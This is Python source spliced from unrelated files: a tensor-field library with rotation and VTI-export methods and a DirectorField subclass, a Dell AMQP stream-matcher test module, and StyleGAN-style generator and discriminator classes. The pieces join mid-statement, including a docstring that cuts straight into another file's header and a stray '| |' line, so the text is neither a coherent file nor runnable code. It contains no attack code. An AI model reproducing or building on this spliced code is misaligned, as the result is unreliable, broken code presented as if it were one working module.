), f"`width` and `height` must be positive integers. Got {width}, {height}."
_device, _dtype = _extract_device_dtype([degrees, translate, scale, shear])
degrees = degrees.to(device=device, dtype=dtype)
angle = _adapted_uniform((batch_size,), degrees[0], degrees[1], same_on_batch)
angle = angle.to(device=_device, dtype=_dtype)
# compute tensor ranges
    if scale
[flip_ax]
if self._Nv==6:
negate_comps = [5-ax,3+(4-ax)%3]
else:
raise Exception("Could not parse axis.")
print("{ 90 deg rotation around axis "+axis[-1]+" }")
if self._mask_vals is not None:
raise Exception("You should always call set_mask after rotate_90deg")
# mapping for the axis order in the raw data array (axis 3 is field component axis)
ax_map = [2, 1, 0, 3]
# permutation of axes and components equivalent to the rotation operation
permut_ax = np.arange(0,4)
permut_ax[ax_map[(ax+1)%3]] = ax_map[(ax+2)%3]
permut_ax[ax_map[(ax+2)%3]] = ax_map[(ax+1)%3]
permut_comp = np.arange(0,self._Nv)
permut_comp[(ax+1)%3] = (ax+2)%3
permut_comp[(ax+2)%3] = (ax+1)%3
if self._Nv==6:
permut_comp[3+(3-ax)%3] = 3+(4-ax)%3
permut_comp[3+(4-ax)%3] = 3+(3-ax)%3
# We apply the axis and component permutations, followed by component negations
self._vals = np.flip(
np.transpose(self.vals, tuple(permut_ax)),
axis = ax_map[flip_ax])[:,:,:,permut_comp]
for comp in negate_comps:
self._vals[:,:,:,comp] = -self._vals[:,:,:,comp]
(self._Nx, self._Ny, self._Nz) = tuple(
self.get_mesh_dimensions()[i] for i in permut_comp[0:3])
(self._Lx, self._Ly, self._Lz) = tuple(
self.get_mesh_lengths()[i] for i in permut_comp[0:3])
(self._dx, self._dy, self._dz) = tuple(
self.get_mesh_spacings()[i] for i in permut_comp[0:3])
def rotate_180deg(self, axis):
"""
        Apply a solid rotation of the tensor field by 180 degrees around the specified axis.
This is a lossless operation which does not rely on interpolation.
Parameters
----------
axis : str
            Axis around which to perform the rotation. Must be of the form 'A', where
            'A'='x', 'y' or 'z' defines the rotation axis.
"""
if axis[0]=="x":
ax = 0
elif axis[0]=="y":
ax = 1
elif axis[0]=="z":
ax = 2
else:
raise Exception("Could not parse axis.")
print("{ 180 deg rotation around axis "+axis[-1]+" }")
if self._mask_vals is not None:
raise Exception("You should always call set_mask after rotate_180deg")
# mapping for the axis order in the raw data array (axis 3 is component axis)
ax_map = np.array([2, 1, 0, 3])
# Axes that will be flipped and components that will be reversed after rotation
flip_axes = [(ax+1)%3, (ax+2)%3]
if self._Nv==3:
negate_comps = flip_axes
if self._Nv==6:
negate_comps = [3+(3-ax)%3, 3+(4-ax)%3]
# We apply the rotation
self._vals = np.flip(self.vals, axis = tuple(ax_map[flip_axes]))
for comp in negate_comps:
self._vals[:,:,:,comp] = -self._vals[:,:,:,comp]
def rotate(self, axis, angle, fill_value=None):
"""
        Apply a solid rotation of the tensor field by an arbitrary angle around the
        specified axis. This is a lossy operation that relies on interpolation, so
        artefacts can appear if the tensor field data is not smooth enough.
Parameters
----------
axis : str
            Axis around which to perform the rotation. Must be of the form 'A', where
            'A'='x', 'y' or 'z' defines the rotation axis.
        angle : float
            Angle of rotation in degrees.
        fill_value : float, optional
            Value assigned to points of the rotated mesh that fall outside the original
            domain. If None (the default), such points are extrapolated by the interpolator.
"""
if axis[0]=="x":
ax = 0
elif axis[0]=="y":
ax = 1
elif axis[0]=="z":
ax = 2
else:
raise Exception("Could not parse axis.")
print("{ Rotation of %.2f° around axis %s }" % (angle,axis[0]))
if self._mask_vals is not None:
raise Exception("You should always call 'set_mask' after 'rotate', not before")
u = np.zeros(3)
u[ax] = 1
rot_mat_inv = R.from_rotvec(-angle*np.pi/180*u).as_dcm()
# For vector field, the transformation operator is simply the rotation matrix. For
# symmetric second-order tensor field, the transformation operator can be obtained
# in Mathematica with appropriate cartesian product and slicing operations (which we
# compact based on roll and flip matrix operations)
if self._Nv==3:
transf_op = R.from_rotvec(angle*np.pi/180*u).as_dcm()
if self._Nv==6:
G = R.from_rotvec(angle*np.pi/180*u).as_dcm()
transf_op = np.zeros((6,6))
transf_op[0:3,0:3] = np.power(G,2)
transf_op[0:3,3:6] = 2*np.flip(np.roll(G,1,axis=1)*np.roll(G,2,axis=1),axis=1)
transf_op[3:6,0:3] = np.flip(np.roll(G,1,axis=0)*np.roll(G,2,axis=0),axis=0)
transf_op[3:6,3:6] = np.flip(
np.roll(np.roll(G,1,axis=1),2,axis=0)*np.roll(np.roll(G,2,axis=1),1,axis=0)+
np.roll(np.roll(G,1,axis=1),1,axis=0)*np.roll(np.roll(G,2,axis=1),2,axis=0))
x = np.linspace(-self._Lx/2, self._Lx/2, self._Nx)
y = np.linspace(-self._Ly/2, self._Ly/2, self._Ny)
z = np.linspace(-self._Lz/2, self._Lz/2, self._Nz)
Z,Y,X = np.meshgrid(z,y,x,indexing="ij")
pos = np.stack((X.flatten(),Y.flatten(),Z.flatten()), axis=1)
pos_rot = np.dot(rot_mat_inv,pos.transpose()).transpose()
tmp = interpn((z,y,x), self._vals, np.flip(pos_rot, axis=1),
bounds_error=False, fill_value=fill_value)
self._vals = np.dot(transf_op,tmp.transpose()).transpose().reshape(
(self._Nz,self._Ny,self._Nx,self._Nv))
def rescale_mesh(self, scaling_factor):
"""
Uniformly scale the mesh using the given scaling factor.
Parameters
----------
        scaling_factor : float
The mesh lengths and spacings will be multiplied by this factor.
"""
(self._Lx,self._Ly,self._Lz) = tuple(scaling_factor*np.array(self.get_mesh_lengths()))
(self._dx,self._dy,self._dz) = tuple(scaling_factor*np.array(self.get_mesh_spacings()))
@property
def vals(self):
"""Numpy array for the tensor values, of shape (Nz,Ny,Nx,Nv), where Nv=3 for a vector
field and Nv=6 for a symmetric second-order tensor field (we only store the
[xx,yy,zz,xy,xz,yz] components for efficiency reasons).
"""
return self._vals
@vals.setter
def vals(self, tensor_ndarray):
if self._vals.shape==tensor_ndarray.shape:
self._vals = tensor_ndarray
else:
raise Exception("Wrong shape for the tensor field ndarray")
def save_to_vti(self, file_name, array_name):
"""Save the tensor field inside a vti file.
Parameters
----------
file_name : string
            Path to the exported vti file. The ".vti" extension is appended automatically
            if it is not already present, so you may omit it from this parameter (the
            extension is never duplicated).
array_name : string
Name of the vti array that will store the tensor field.
"""
if file_name[-4:]==".vti":
path = file_name
else:
path = file_name+".vti"
print("{ Saving tensor field to "+path+" }")
vti_data = vtkImageData()
vti_data.SetDimensions(self._Nx, self._Ny, self._Nz)
vti_data.SetOrigin(-self._Lx/2, -self._Ly/2, -self._Lz/2)
vti_data.SetSpacing(self._dx, self._dy, self._dz)
tensor_data = \
vn.numpy_to_vtk(self._vals.reshape((self._Nx*self._Ny*self._Nz,self._Nv)))
tensor_data.SetName(array_name)
vti_data.GetPointData().AddArray(tensor_data)
if self._mask_type is not None:
mask_data = vn.numpy_to_vtk(
self.mask_vals.reshape((self._Nx*self._Ny*self._Nz,1)))
mask_data.SetName("domain_mask")
vti_data.GetPointData().AddArray(mask_data)
writer = vtkXMLImageDataWriter()
writer.SetFileName(path)
writer.SetInputData(vti_data)
writer.Write()
def get_pos(self, ix, iy, iz):
"""Returns the spatial position associated with the mesh indices (ix,iy,iz)
It is assumed that the mesh is centered on the origin (0,0,0).
"""
return (ix*self._dx-self._Lx/2, iy*self._dy-self._Ly/2, iz*self._dz-self._Lz/2)
def get_mesh_dimensions(self):
"""Returns the dimensions (Nx,Ny,Nz) of the simulation mesh"""
return (self._Nx, self._Ny, self._Nz)
def get_mesh_lengths(self):
"""Returns the lengths (Lx,Ly,Lz) of the simulation mesh"""
return (self._Lx, self._Ly, self._Lz)
def get_mesh_spacings(self):
"""Returns the spacings (dx,dy,dz) of the simulation mesh"""
return (self._dx, self._dy, self._dz)
def get_n_vertices(self):
"""Returns the number of vertices in the simulation mesh"""
return self._Nx*self._Ny*self._Nz
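# Illustrative usage sketch (not part of the library code): chaining the lossless and
# lossy rotations on a field and exporting it. The mesh values below are assumptions.
#
#   nfield = DirectorField(mesh_lengths=(1, 1, 1), mesh_dimensions=(32, 32, 32))
#   nfield.init_from_funcs(lambda x, y, z: 0*x, lambda x, y, z: 0*y, lambda x, y, z: 1+0*z)
#   nfield.normalize()
#   nfield.rotate_180deg("x")    # lossless: flips axes and negates components
#   nfield.rotate("y", 30)       # lossy: relies on interpolation
#   nfield.save_to_vti("rotated_field")  # DirectorField fixes the vti array name to "n"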
class DirectorField(TensorField):
"""
A specialization of the TensorField class for director fields.
The two versions of the constructor of the parent class TensorField are simplified since
we do not need the parameters 'tensor_order' (always 1 for a director field) or
'vti_array' (assumed to be "n"):
.. code-block:: python
# First version of the constructor
nfield = DirectorField(
mesh_lengths=(Lx,Ly,Lz), mesh_dimensions=(Nx,Ny,Nz))
# Second version of the constructor
nfield = DirectorField(
vti_file="path to vti file", vti_array="name of tensor array")
In addition to all the methods of the parent class for initializing and manipulating
the field values, we specialize the "save_to_vti" method (imposing that the exported vti
array name is always "n") and provide additional methods for initializing the
director field values from theoretical functions, exporting a q-tensor field from the
director field, and normalizing the director field to unit norm.
"""
def __init__(self, **kwargs):
if "vti_file" in kwargs:
kwargs["vti_array"] = "n"
elif "mesh_lengths" in kwargs and "mesh_dimensions" in kwargs:
kwargs["tensor_order"] = 1
else:
raise Exception("Could not parse the constructor parameters of DirectorField")
super().__init__(**kwargs)
def init_from_funcs(self, nx_func, ny_func, nz_func):
"""Initialize the director field from three functions for each of its component. The
functions must depend on the space variables ``x``, ``y`` and ``z``. We recall that
the mesh is centered on the origin.
If the given functions are numpy-vectorizable, this function should be pretty fast. If
not, a warning will be printed and the faulty function(s) will be vectorized with the
numpy method ``vectorize`` (in which case you should expect a much slower execution
time).
"""
print("{ Calculating director values from user functions }")
zz, yy, xx = np.meshgrid(np.linspace(-self._Lz/2, self._Lz/2, self._Nz),
np.linspace(-self._Ly/2, self._Ly/2, self._Ny),
np.linspace(-self._Lx/2, self._Lx/2, self._Nx),
indexing="ij")
# We verify if the user functions are vectorizable
dummy_arr = np.ones((2,2,2))
try:
nx_func(dummy_arr,dummy_arr,dummy_arr)
        except Exception:
print("\tnx_func is not vectorized, using a non-optimized version instead.")
nx_func = np.vectorize(nx_func)
try:
ny_func(dummy_arr,dummy_arr,dummy_arr)
        except Exception:
print("\tny_func is not vectorized, using a non-optimized version instead.")
ny_func = np.vectorize(ny_func)
try:
nz_func(dummy_arr,dummy_arr,dummy_arr)
        except Exception:
print("\tnz_func is not vectorized, using a non-optimized version instead.")
nz_func = np.vectorize(nz_func)
self._vals = np.concatenate((np.expand_dims(nx_func(xx, yy, zz), axis=3),
np.expand_dims(ny_func(xx, yy, zz), axis=3),
np.expand_dims(nz_func(xx, yy, zz), axis=3)), 3)
def normalize(self):
"""Normalize the director field values to unit norm."""
print("{ Normalizing director values to 1 }")
norms = np.sqrt(np.sum(self._vals**2, axis=3, keepdims=True))
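        # Guard against division by zero for directors whose norm is exactly zero.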
norms[norms==0] = 1
self._vals = self._vals / np.tile(norms, (1,1,1,3))
def get_qtensor_field(self):
"""Returns a QTensorField object equivalent to the director field represented by this
        class, assuming a constant scalar order parameter (equal to
"""
Copyright (c) 2017 Dell Inc. or its subsidiaries. All Rights Reserved.
A set of super-simple matchers to use to self-test the matching framework.
"""
from gevent import monkey
monkey.patch_dns()
monkey.patch_time()
monkey.patch_builtins()
monkey.patch_select()
import re
import sys
import optparse
import uuid
import gevent
import gevent.queue
from pexpect import EOF
from datetime import datetime, timedelta
from .monitor_abc import StreamMonitorBaseClass
from .stream_matchers_base import StreamMatchBase
from .stream_matchers_results import StreamRunResults, MatcherValidationMissmatch, MatcherValidationMissingField
from .amqp_od import RackHDAMQPOnDemand
from .ssh_helper import SSHHelper
from kombu import Connection, Producer, Queue, Exchange, Consumer
class _KeyedConsumerHandler(object):
_keyed_consumers = {}
@classmethod
def get_keyed_consumer(cls, logs, connection, exchange, routing_key, queue_name, event_cb):
mname = "ex={} rk={} qn={}".format(exchange, routing_key, queue_name)
if mname not in cls._keyed_consumers:
new_one = _KeyedConsumerHandler(logs, connection, mname, exchange, routing_key, queue_name)
cls._keyed_consumers[mname] = new_one
cls._keyed_consumers[mname].add_new_event_handler(event_cb)
return cls._keyed_consumers[mname]
@classmethod
def test_helper_finalize_cleanup(cls):
cls._keyed_consumers = {}
def __init__(self, logs, connection, name, exchange, routing_key, queue_name):
self.__logs = logs
self.__ignore_some_stuff = False
self.name = name
self.__event_callbacks = []
if queue_name is None:
queue_name = ''
exclusive = True
else:
exclusive = False
chan = connection.channel()
ex = Exchange(exchange, 'topic', channel=chan)
queue = Queue(exchange=ex, routing_key=routing_key, exclusive=exclusive)
consumer = Consumer(chan, queues=[queue], callbacks=[self.__message_cb])
consumer.consume()
self.exchange = ex
def add_new_event_handler(self, event_cb):
self.__event_callbacks.append(event_cb)
def __message_cb(self, body, msg):
skip = False
if self.__ignore_some_stuff:
if "heartbeat" in msg.delivery_info['routing_key']:
skip = True
if msg.delivery_info['routing_key'].startswith('http'):
skip = True
if msg.delivery_info['routing_key'].startswith('polleralert'):
skip = True
if skip:
self.__logs.idl.debug_8('AMQP-SKIP=%s', msg.delivery_info['routing_key'])
msg.ack()
return
self.__logs.idl.debug_8(
'Inbound AMQP msg. %s (delivery_info=%s, content_type=%s, properties=%s, body=%s)',
msg, msg.delivery_info, msg.content_type, msg.properties, body)
for event_cb in self.__event_callbacks:
try:
event_cb(msg, body)
self.__logs.debug_8(' -- ran %s on msg', event_cb)
except Exception as proc_ex:
self.__logs.warning('exception while running %s on %s: %s', event_cb, msg, proc_ex)
msg.ack()
class _AMQPServerWrapper(object):
def __init__(self, amqp_url, logs):
self.__logs = logs
self.__amqp_url = amqp_url
self.__monitors = {}
self.__connection = Connection(self.__amqp_url)
self.__connection.connect()
self.__running = True
self.__consumer_gl = gevent.spawn(self.__consumer_greenlet_main)
self.__consumer_gl.greenlet_name = 'amqp-consumer-gl' # allowing flogging to print a nice name
gevent.sleep(0.0)
def __consumer_greenlet_main(self):
gevent.sleep(0)
while self.__running:
try:
self.__connection.drain_events(timeout=0.5)
except Exception as ex: # NOQA: assigned but not used (left in for super-duper-low-level-debug)
# print("was woken because {}".format(ex))
pass
gevent.sleep(0.1) # make -sure- to yield cpu...
# print("---loop")
def stop_greenlet(self):
self.__running = False
@property
def connected(self):
return self.__connection.connected
def create_add_tracker(self, exchange, routing_key, event_cb, queue_name=None):
self.__logs.irl.debug("AMQPServerWrapper: create_add_tracker ex=%s, rk=%s, event_cb=%s",
exchange, routing_key, event_cb)
mon = _KeyedConsumerHandler.get_keyed_consumer(
self.__logs, self.__connection, exchange, routing_key, queue_name, event_cb)
return mon.exchange
def inject(self, exchange, routing_key, payload):
self.__logs.irl.debug("Injecting a test AMQP message: ex=%s, rk=%s, payload=%s", exchange, routing_key, payload)
if not isinstance(exchange, Exchange):
exchange = Exchange(exchange, 'topic')
prod = Producer(self.__connection, exchange=exchange, routing_key=routing_key)
prod.publish(payload)
def test_helper_sync_send_msg(self, exchange, ex_rk, send_rk, payload):
ex = Exchange(exchange, 'topic')
queue = Queue(exchange=ex, routing_key=ex_rk + '.*', exclusive=True, channel=self.__connection)
queue.declare()
prod = Producer(self.__connection, exchange=ex, routing_key=send_rk)
prod.publish(payload)
return queue
def test_helper_sync_recv_msg(self, queue):
for tick in range(10):
msg = queue.get()
if msg is not None:
break
return msg
class _AMQPMatcher(StreamMatchBase):
"""
Implementation of a StreamMatchBase matcher.
"""
def __init__(self, logs, route_key, description, min=1, max=sys.maxint, validation_block=None, match_CB=None):
self.__route_key = route_key
self.__validation_block = validation_block
self.__match_CB = match_CB
if route_key is not None:
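            # Translate the AMQP topic routing key into a regex: in AMQP, '*' matches
            # exactly one dot-delimited word and '#' matches zero or more words.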
escaped_key = re.escape(route_key)
no_star = escaped_key.replace('*', '[^.]')
no_pound = no_star.replace('\#', '.*?')
self.__rk_regex = re.compile('^{}$'.format(no_pound))
self.__no_pound = no_pound
else:
self.__rk_regex = re.compile('.*')
super(_AMQPMatcher, self).__init__(logs, description, min=min, max=max)
def _match(self, other_event):
if self.__route_key is None:
return bool(other_event)
assert isinstance(other_event, _AMQPTrackerRecord), \
'other_event was a {} needs to be a {}'.format(type(other_event), _AMQPTrackerRecord)
m = self.__rk_regex.match(other_event.msg.delivery_info['routing_key'])
if m is None:
return False
if self.__match_CB is None:
return True
return self.__match_CB(other_event)
def _validate(self, other_event):
self._logs.idl.debug('validating event %s', other_event)
assert isinstance(other_event, _AMQPTrackerRecord), \
'other_event was a {} needs to be a {}'.format(type(other_event), _AMQPTrackerRecord)
if self.__validation_block is None:
return []
error_list = []
if 'routing_key' in self.__validation_block:
crk = self.__validation_block['routing_key']
ork = other_event.msg.delivery_info['routing_key']
if crk != ork:
self._logs.irl.debug(' Invalidated because rk %s does not match expected %s', ork, crk)
err = MatcherValidationMissmatch('msg.delivery_info', 'routing_key', crk, ork)
error_list.append(err)
if 'body' in self.__validation_block:
exp_body = self.__validation_block['body']
other_body = other_event.body
# todo: recursion
# todo: extra fields in other
for field_name, exp_value in exp_body.items():
if field_name not in other_body:
self._logs.irl.debug(" Invalidated because field %s not in event's fields %s", field_name,
other_body.keys())
err = MatcherValidationMissingField('body', field_name, exp_value)
error_list.append(err)
else:
# ok, it's there....
if exp_value == '<<present>>':
# that's good enough!
pass
elif exp_value != other_body[field_name]:
self._logs.irl.debug(" Invalidated because field %s value %s does not match expected %s",
field_name, other_body[field_name], exp_value)
err = MatcherValidationMissmatch('body', field_name, exp_value, other_body[field_name])
error_list.append(err)
pass
else:
pass
self._logs.irl.debug('Validation complete: error_list=%s', error_list)
return error_list
def dump(self, ofile=sys.stdout, indent=0):
super(_AMQPMatcher, self).dump(ofile=ofile, indent=indent)
ins = ' ' * indent
print >>ofile, "{0} route_key='{1}'".format(ins, self.__route_key)
class _AMQPProcessor(StreamMonitorBaseClass):
def __init__(self, logs, tracker, start_at=None, transient=True):
self._logs = logs
super(_AMQPProcessor, self).__init__()
self.handle_begin()
self.transient = transient
self.__tracker = tracker
self.__inbound_queue = gevent.queue.Queue()
self.__run_till = None
self.__tail_timeout = None
self.__in_finish_mode = False
self.__ignore_misses = False
# THIS is a hack to allow raw access to underlying tracker-records until we get a common
# validation phase. See get_raw_tracker_events() below for details
self.__matches_in_order = []
self.__started_at = tracker.add_processor(self, start_at=start_at)
self.__match_greenlet = gevent.spawn(self.__match_greenlet_run)
self.__match_greenlet.greenlet_name = 'processor-match-loop-gl'
def __match_greenlet_run(self):
self._logs.irl.debug('Starting to watch for events %s', self)
results = StreamRunResults()
tail_limit = None
loop_exit_why = None
noticed_change_to_finish = False
lcnt = 0
loop_slice = 0.1
five_s_mod = int(5 / loop_slice)
        # Note: we eventually want to make it possible to NOT have to call
# start_finish before processing, but there are some icky glitches
# there I don't have time to hunt down. So, for now, just hang here
# until all the rules are set up.
while not self.__in_finish_mode:
gevent.sleep(0.1)
while (loop_exit_why is None) and (self.__run_till is None or self.__run_till > datetime.now()):
if lcnt % five_s_mod == 0:
if self.__run_till is None:
left = 'N/A'
else:
left = self.__run_till - datetime.now()
self._logs.irl.debug('Periodic loop: count=%d, run_till=%s, left=%s', lcnt, self.__run_till, left)
lcnt += 1
# we always want to setup tail_limit when we first cross over to finishing
if not noticed_change_to_finish and self.__in_finish_mode:
noticed_change_to_finish = True
self._logs.irl.debug(' Noticed that we shifted to finish-mode')
if tail_limit is None:
tail_limit = datetime.now() + self.__tail_timeout
self._logs.irl.debug(' and set tail-limit from none to %s', tail_limit)
try:
# timeout on peek call is needed to allow us to "notice" if our run-till
# or tail-time has been exceeded.
tracked = self.__inbound_queue.peek(timeout=loop_slice)
self._logs.idl.debug('%s peeked and got %s', self, tracked)
except gevent.queue.Empty:
tracked = None
if tracked is None:
# no message on queue.
if tail_limit is not None and datetime.now() > tail_limit:
self._logs.irl.debug(' hit tail limit during idle. Checking if end-check will work')
res = self._match_groups.check_ending()
self._logs.irl.debug(' check-res was %s, results-state=%s', res, 'results.dump(None)')
if res.is_empty:
self._logs.irl.debug(' and we can stop because processor in success state')
loop_exit_why = "tail-wait expired while processor in success state"
else:
# clear the tail-limit till another event hits us
self._logs.irl.debug(' and clearing tail-limit since we are not in success state: %s', res)
tail_limit = None
continue
res = self._match_groups.check_event(tracked, allow_complete_miss=self.__ignore_misses)
consume = False
if not res.is_empty:
consume = True
results.add_result(res)
self.__matches_in_order.append(tracked)
elif self.__ignore_misses:
# note: ignore_miss can only be set as we enter start-finish mode.
consume = True
if consume:
# remove consumed item from queue.
self.__inbound_queue.get()
if self.__tail_timeout is not None:
# we consumed a message, so bump out tail-limit
old_tail_limit = tail_limit
tail_limit = datetime.now() + self.__tail_timeout
self._logs.irl.debug(' consumed event. Bumping tail-limit from %s to %s', old_tail_limit, tail_limit)
if loop_exit_why is None:
            loop_exit_why = "overall timeout occurred"
self._logs.irl.debug('Periodic loop exit because %s count=%d, run_till=%s, now=%s',
loop_exit_why, lcnt, self.__run_till, datetime.now())
self._logs.irl.debug('---exiting loop because %s---: %s -> %s', loop_exit_why, self, results)
res = self._match_groups.check_ending()
results.add_result(res)
self._logs.irl.debug(' final results from %s is %s', self, results)
return results
def start_finish(self, timeout, tail_timeout=1.0, ignore_misses=True):
timeout = timedelta(seconds=timeout)
tail_timeout = timedelta(seconds=tail_timeout)
self._logs.irl.debug('start_finish on %s called. timeout=%s, tail-timeout=%s', self, timeout, tail_timeout)
self.__tail_timeout = tail_timeout
self.__run_till = datetime.now() + timeout + tail_timeout
self.__ignore_misses = ignore_misses
self.__in_finish_mode = True
return self.__match_greenlet
def process_tracked_record(self, tracked_record):
self._logs.irl.debug('Processing-tracked-record = %s', tracked_record)
self.__inbound_queue.put(tracked_record)
def match_any_event(self, description=None, min=1, max=1):
if description is None:
description = "match-any(rk={},min={},max={}".format(None, min, max)
m = _AMQPMatcher(self._logs, route_key=None, description=description, min=min, max=max)
self._add_matcher(m)
def match_on_routekey(self, description, routing_key=None, min=1, max=1, validation_block=None, match_CB=None):
if routing_key is None:
routing_key = '#'
description = "{}(rk={},min={},max={})".format(description, routing_key, min, max)
m = _AMQPMatcher(self._logs, route_key=routing_key, description=description, | |
depth, lr_mul = 0.1):
super().__init__()
layers = []
for i in range(depth):
layers.extend([EqualLinear(emb, emb, lr_mul), leaky_relu()])
self.net = nn.Sequential(*layers)
def forward(self, x):
x = F.normalize(x, dim=1)
return self.net(x)
class RGBBlock(nn.Module):
def __init__(self, latent_dim, input_channel, upsample, rgba = False):
super().__init__()
self.input_channel = input_channel
self.to_style = nn.Linear(latent_dim, input_channel)
out_filters = 3 if not rgba else 4
self.conv = Conv2DMod(input_channel, out_filters, 1, demod=False)
self.upsample = nn.Sequential(
nn.Upsample(scale_factor = 2, mode='bilinear', align_corners=False),
Blur()
) if upsample else None
def forward(self, x, prev_rgb, istyle):
b, c, h, w = x.shape
style = self.to_style(istyle)
x = self.conv(x, style)
if exists(prev_rgb):
x = x + prev_rgb
if exists(self.upsample):
x = self.upsample(x)
return x
class Conv2DMod(nn.Module):
def __init__(self, in_chan, out_chan, kernel, demod=True, stride=1, dilation=1, eps = 1e-8, **kwargs):
super().__init__()
self.filters = out_chan
self.demod = demod
self.kernel = kernel
self.stride = stride
self.dilation = dilation
self.weight = nn.Parameter(torch.randn((out_chan, in_chan, kernel, kernel)))
self.eps = eps
nn.init.kaiming_normal_(self.weight, a=0, mode='fan_in', nonlinearity='leaky_relu')
def _get_same_padding(self, size, kernel, dilation, stride):
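        # "Same" padding for the grouped convolution below: with the defaults
        # (stride=1, dilation=1) this reduces to (kernel - 1) // 2, e.g. size=32,
        # kernel=3 -> padding 1, which preserves the spatial resolution.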
return ((size - 1) * (stride - 1) + dilation * (kernel - 1)) // 2
def forward(self, x, y):
b, c, h, w = x.shape
w1 = y[:, None, :, None, None]
w2 = self.weight[None, :, :, :, :]
weights = w2 * (w1 + 1)
if self.demod:
d = torch.rsqrt((weights ** 2).sum(dim=(2, 3, 4), keepdim=True) + self.eps)
weights = weights * d
x = x.reshape(1, -1, h, w)
_, _, *ws = weights.shape
weights = weights.reshape(b * self.filters, *ws)
padding = self._get_same_padding(h, self.kernel, self.dilation, self.stride)
x = F.conv2d(x, weights, padding=padding, groups=b)
x = x.reshape(-1, self.filters, h, w)
return x
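    # Illustrative shape sketch for Conv2DMod (assumed values, not part of the original
    # code): one style-modulated kernel is built per sample and applied in a single
    # grouped F.conv2d call.
    #
    #   conv = Conv2DMod(in_chan=64, out_chan=128, kernel=3)
    #   x = torch.randn(4, 64, 32, 32)   # (batch, channels, H, W)
    #   y = torch.randn(4, 64)           # one style vector per sample
    #   out = conv(x, y)                 # -> (4, 128, 32, 32)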
class GeneratorBlock(nn.Module):
def __init__(self, latent_dim, input_channels, filters, upsample = True, upsample_rgb = True, rgba = False):
super().__init__()
self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=False) if upsample else None
self.to_style1 = nn.Linear(latent_dim, input_channels)
self.to_noise1 = nn.Linear(1, filters)
self.conv1 = Conv2DMod(input_channels, filters, 3)
self.to_style2 = nn.Linear(latent_dim, filters)
self.to_noise2 = nn.Linear(1, filters)
self.conv2 = Conv2DMod(filters, filters, 3)
self.activation = leaky_relu()
self.to_rgb = RGBBlock(latent_dim, filters, upsample_rgb, rgba)
def forward(self, x, prev_rgb, istyle, inoise):
if exists(self.upsample):
x = self.upsample(x)
inoise = inoise[:, :x.shape[2], :x.shape[3], :]
noise1 = self.to_noise1(inoise).permute((0, 3, 2, 1))
noise2 = self.to_noise2(inoise).permute((0, 3, 2, 1))
style1 = self.to_style1(istyle)
x = self.conv1(x, style1)
x = self.activation(x + noise1)
style2 = self.to_style2(istyle)
x = self.conv2(x, style2)
x = self.activation(x + noise2)
rgb = self.to_rgb(x, prev_rgb, istyle)
return x, rgb
class DiscriminatorBlock(nn.Module):
def __init__(self, input_channels, filters, downsample=True):
super().__init__()
self.conv_res = nn.Conv2d(input_channels, filters, 1, stride = (2 if downsample else 1))
self.net = nn.Sequential(
nn.Conv2d(input_channels, filters, 3, padding=1),
leaky_relu(),
nn.Conv2d(filters, filters, 3, padding=1),
leaky_relu()
)
self.downsample = nn.Sequential(
Blur(),
nn.Conv2d(filters, filters, 3, padding = 1, stride = 2)
) if downsample else None
def forward(self, x):
res = self.conv_res(x)
x = self.net(x)
if exists(self.downsample):
x = self.downsample(x)
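        # Variance-preserving residual: scaling the sum by 1/sqrt(2) keeps activation
        # magnitudes roughly constant as blocks are stacked.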
x = (x + res) * (1 / math.sqrt(2))
return x
class Generator(nn.Module):
def __init__(self, image_size, latent_dim, network_capacity = 16, transparent = False, attn_layers = [], no_const = False, fmap_max = 512):
super().__init__()
self.image_size = image_size
self.latent_dim = latent_dim
self.num_layers = int(log2(image_size) - 1)
filters = [network_capacity * (2 ** (i + 1)) for i in range(self.num_layers)][::-1]
set_fmap_max = partial(min, fmap_max)
filters = list(map(set_fmap_max, filters))
init_channels = filters[0]
filters = [init_channels, *filters]
in_out_pairs = zip(filters[:-1], filters[1:])
self.no_const = no_const
if no_const:
self.to_initial_block = nn.ConvTranspose2d(latent_dim, init_channels, 4, 1, 0, bias=False)
else:
self.initial_block = nn.Parameter(torch.randn((1, init_channels, 4, 4)))
self.initial_conv = nn.Conv2d(filters[0], filters[0], 3, padding=1)
self.blocks = nn.ModuleList([])
self.attns = nn.ModuleList([])
for ind, (in_chan, out_chan) in enumerate(in_out_pairs):
not_first = ind != 0
not_last = ind != (self.num_layers - 1)
num_layer = self.num_layers - ind
attn_fn = attn_and_ff(in_chan) if num_layer in attn_layers else None
self.attns.append(attn_fn)
block = GeneratorBlock(
latent_dim,
in_chan,
out_chan,
upsample = not_first,
upsample_rgb = not_last,
rgba = transparent
)
self.blocks.append(block)
def forward(self, styles, input_noise):
batch_size = styles.shape[0]
image_size = self.image_size
if self.no_const:
avg_style = styles.mean(dim=1)[:, :, None, None]
x = self.to_initial_block(avg_style)
else:
x = self.initial_block.expand(batch_size, -1, -1, -1)
rgb = None
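        # styles arrives as (batch, num_layers, latent_dim); transpose it so the loop
        # below can hand one per-layer style vector of shape (batch, latent_dim) to each block.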
styles = styles.transpose(0, 1)
x = self.initial_conv(x)
for style, block, attn in zip(styles, self.blocks, self.attns):
if exists(attn):
x = attn(x)
x, rgb = block(x, rgb, style, input_noise)
return rgb
class Discriminator(nn.Module):
def __init__(self, image_size, network_capacity = 16, fq_layers = [], fq_dict_size = 256, attn_layers = [], transparent = False, fmap_max = 512):
super().__init__()
num_layers = int(log2(image_size) - 1)
num_init_filters = 3 if not transparent else 4
blocks = []
filters = [num_init_filters] + [(network_capacity * 4) * (2 ** i) for i in range(num_layers + 1)]
set_fmap_max = partial(min, fmap_max)
filters = list(map(set_fmap_max, filters))
chan_in_out = list(zip(filters[:-1], filters[1:]))
blocks = []
attn_blocks = []
quantize_blocks = []
for ind, (in_chan, out_chan) in enumerate(chan_in_out):
num_layer = ind + 1
is_not_last = ind != (len(chan_in_out) - 1)
block = DiscriminatorBlock(in_chan, out_chan, downsample = is_not_last)
blocks.append(block)
attn_fn = attn_and_ff(out_chan) if num_layer in attn_layers else None
attn_blocks.append(attn_fn)
quantize_fn = PermuteToFrom(VectorQuantize(out_chan, fq_dict_size)) if num_layer in fq_layers else None
quantize_blocks.append(quantize_fn)
self.blocks = nn.ModuleList(blocks)
self.attn_blocks = nn.ModuleList(attn_blocks)
self.quantize_blocks = nn.ModuleList(quantize_blocks)
chan_last = filters[-1]
latent_dim = 2 * 2 * chan_last
self.final_conv = nn.Conv2d(chan_last, chan_last, 3, padding=1)
self.flatten = Flatten()
self.to_logit = nn.Linear(latent_dim, 1)
def forward(self, x):
b, *_ = x.shape
quantize_loss = torch.zeros(1).to(x)
